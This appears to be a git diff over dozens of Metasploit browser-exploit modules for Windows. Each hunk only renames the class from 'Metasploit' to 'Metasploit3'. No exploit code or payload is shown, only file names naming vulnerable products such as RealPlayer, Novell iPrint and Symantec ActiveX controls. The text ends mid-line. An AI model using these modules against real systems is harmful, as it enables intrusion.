Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index faae514207..040ee2fa16 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 41f2c31d9c..5202ae760e 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index 5999148607..d137afaaea 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index b5d00aff61..292b1c9539 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index 03c8a82aab..d6e76ffe2d 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index d0a4704c72..2c5c4424cf 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index ea2379aedf..28b4f9ef75 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index 058dc22ee0..d247e134c7 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 555aa0c197..6ec5f52b65 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index 8741654bd1..cc6954458c 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index 967bd84e24..fd55d572ea 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 2cbb87b687..70db241a7c 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index ab4fb3f201..4461b2a70e 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb index 3404876347..846f4befde 100644 --- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb +++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb index 186c7d667b..9c195aa332 100644 --- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb +++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb index 40adfa52ce..694e4d6431 100644 --- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb +++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index 6628894771..51961e8099 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index 21eecba0d8..f80e83d451 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index e5bb43c8b5..5295485415 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index ee1d52e8c4..34d945a5d1 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index 156f23e32f..c5c57b34c1 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 8c08ac7c70..a74f4bcff9 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb index c47259683d..d260b5ba37 100644 --- a/modules/exploits/windows/browser/quickr_qp2_bof.rb +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index 5ad241e379..c2afc67f27 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index 2ad7b5a206..75f94ecd5b 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 7eee59b751..33fedfc9c6 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 78ba6303e3..0aab25f860 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index df17c639ae..9a14d5500a 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index 11d1b1780f..7c0cc98bb6 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index b07927b886..af12347a60 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index 2ab0e28757..d6fe45cc71 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb index a94a53dff0..74706eabcb 100644 --- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb +++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index b7277f7ed2..3fee969510 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb index df772422a7..33f43e125b 100644 --- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb +++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index 799cd57762..b234fe3cdb 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index 79a53c828b..826b8ebc90 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index b7336f7765..de69777a84 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index cd40668d47..bdad1cf0ff 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 0b42ce3594..034b2bb5a2 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index afc6b3d02c..aa83462d25 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index 7cad373737..040559c4ba 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb index 854ae601b0..e3471a628f 100644 --- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb +++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 0410a94e30..0d0a45ad76 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index 3b7d5f41c2..d699f52c02 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index f067044f3f..c784f2aace 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index 8594cdd2c9..8d3c754bbf 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -33,7 +33,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index 77b99ef886..94fbfcded7 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index b496c793f7..f012e29f3c 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 13b93f35c7..8bbdc303e6 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb index a8cde33a1a..cdb9360048 100644 --- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb +++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 3c262460f8..05b995f2ba 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index eac2e072f9..9ad826a3e4 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 51946b5f40..5aac5af13b 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index 9049069e6c..b6d98e0d67 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb index 1763f073d5..69886b5b78 100644 --- a/modules/exploits/windows/browser/vlc_mms_bof.rb +++ b/modules/exploits/windows/browser/vlc_mms_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 7ea686f302..0751a93afc 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index bba93b9c68..a4aa0fee3e 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb index a9d5e1b38b..6efae24eeb 100644 --- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb +++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index c444a5fc6d..eaba3e96eb 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 55dc7573cb..3d2cc4191f 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index d53d5caa3c..4d7d428b0a 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include 